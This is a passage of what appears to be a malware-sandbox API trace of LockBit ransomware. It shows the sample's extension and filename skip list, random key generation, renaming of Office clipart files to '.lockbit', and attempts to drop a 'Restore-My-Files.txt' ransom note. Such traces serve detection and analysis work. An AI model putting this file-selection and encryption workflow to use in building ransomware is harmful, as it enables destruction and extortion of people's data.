lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.805] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.805] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.806] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107750.WMF") returned 1 [0142.806] lstrcmpiW (lpString1="ntldr", lpString2="J0107750.WMF") returned 1 [0142.807] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107750.WMF") returned 1 [0142.807] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107750.WMF") returned -1 [0142.807] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107750.WMF") returned -1 [0142.807] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107750.WMF") returned 1 [0142.807] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107750.WMF") returned -1 [0142.807] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.807] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned=".WMF" [0142.807] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.807] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.807] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.807] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.807] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.807] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.807] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.807] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.807] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.807] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.807] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.807] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.807] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.807] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.808] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.808] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.808] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.808] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.808] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.808] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.808] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.808] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.808] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.808] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.808] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.808] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.808] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.808] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.808] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF.lockbit") returned 72 [0142.808] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107750.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0142.809] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.809] malloc (_Size=0x40068) returned 0x3e70008 [0142.809] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=4716) returned 1 [0142.810] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.810] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0142.810] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.811] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0142.811] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0142.833] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.833] malloc (_Size=0xa6) returned 0x77d7a8 [0142.833] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.835] free (_Block=0x77d7a8) [0142.835] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.835] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.835] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.835] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f01310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4146, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0136865.WMF", cAlternateFileName="")) returned 1 [0142.835] lstrcmpiW (lpString1=".", lpString2="J0136865.WMF") returned -1 [0142.835] lstrcmpiW (lpString1="..", lpString2="J0136865.WMF") returned -1 [0142.835] PathFindExtensionW (pszPath="J0136865.WMF") returned=".WMF" [0142.835] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.835] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.835] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.835] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.835] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.835] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.835] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.835] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.835] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.836] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.837] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.837] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0136865.WMF") returned 1 [0142.837] lstrcmpiW (lpString1="ntldr", lpString2="J0136865.WMF") returned 1 [0142.837] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0136865.WMF") returned 1 [0142.837] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0136865.WMF") returned -1 [0142.837] lstrcmpiW (lpString1="autorun.inf", lpString2="J0136865.WMF") returned -1 [0142.837] lstrcmpiW (lpString1="thumbs.db", lpString2="J0136865.WMF") returned 1 [0142.838] lstrcmpiW (lpString1="iconcache.db", lpString2="J0136865.WMF") returned -1 [0142.838] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.838] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned=".WMF" [0142.838] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.838] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.838] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.839] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.839] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.839] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.839] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF.lockbit") returned 72 [0142.839] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0136865.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0142.875] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.875] malloc (_Size=0x40068) returned 0x1ff1e60 [0142.875] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=16710) returned 1 [0142.875] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.875] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0142.876] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.876] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0142.876] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.879] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.879] malloc (_Size=0xa6) returned 0x77d7a8 [0142.879] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.880] free (_Block=0x77d7a8) [0142.880] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.880] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.881] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.881] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55eb4900, ftCreationTime.dwHighDateTime=0x1bdbf6f, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x55eb4900, ftLastWriteTime.dwHighDateTime=0x1bdbf6f, nFileSizeHigh=0x0, nFileSizeLow=0x9d27, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0144773.JPG", cAlternateFileName="")) returned 1 [0142.881] lstrcmpiW (lpString1=".", lpString2="J0144773.JPG") returned -1 [0142.881] lstrcmpiW (lpString1="..", lpString2="J0144773.JPG") returned -1 [0142.881] PathFindExtensionW (pszPath="J0144773.JPG") returned=".JPG" [0142.881] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0142.881] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0142.881] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0142.881] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0142.881] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0142.881] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0142.881] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0142.881] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0142.881] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0142.881] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0142.881] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0142.881] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0142.882] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0142.882] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0142.882] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0142.882] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0142.882] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0142.882] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0142.882] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0142.882] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0142.882] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0142.882] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0142.882] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0142.882] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0142.882] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0142.882] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0142.882] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0142.882] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0142.882] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0142.882] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0142.882] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0142.882] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0142.883] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0142.883] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0142.883] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0142.883] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0142.883] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0142.883] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0142.883] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0142.883] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0142.883] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0142.883] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0142.883] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0142.883] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0142.883] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0142.883] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0142.883] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0142.883] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0144773.JPG") returned 1 [0142.883] lstrcmpiW (lpString1="ntldr", lpString2="J0144773.JPG") returned 1 [0142.883] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0144773.JPG") returned 1 [0142.883] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0144773.JPG") returned -1 [0142.883] lstrcmpiW (lpString1="autorun.inf", lpString2="J0144773.JPG") returned -1 [0142.883] lstrcmpiW (lpString1="thumbs.db", lpString2="J0144773.JPG") returned 1 [0142.884] lstrcmpiW (lpString1="iconcache.db", lpString2="J0144773.JPG") returned -1 [0142.884] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.884] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned=".JPG" [0142.884] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0142.884] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0142.884] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0142.884] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0142.884] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0142.884] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0142.884] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0142.884] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0142.884] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0142.884] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0142.884] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0142.884] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0142.884] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0142.884] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0142.884] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0142.884] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0142.885] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0142.885] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0142.885] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0142.885] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0142.885] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0142.885] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0142.885] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0142.885] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0142.885] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0142.885] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0142.885] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0142.885] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0142.885] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG.lockbit") returned 72 [0142.885] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0144773.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0142.893] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.894] malloc (_Size=0x40068) returned 0x3df0008 [0142.894] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=40231) returned 1 [0142.894] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.894] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.894] BCryptGenRandom (in: hAlgorithm=0x0, 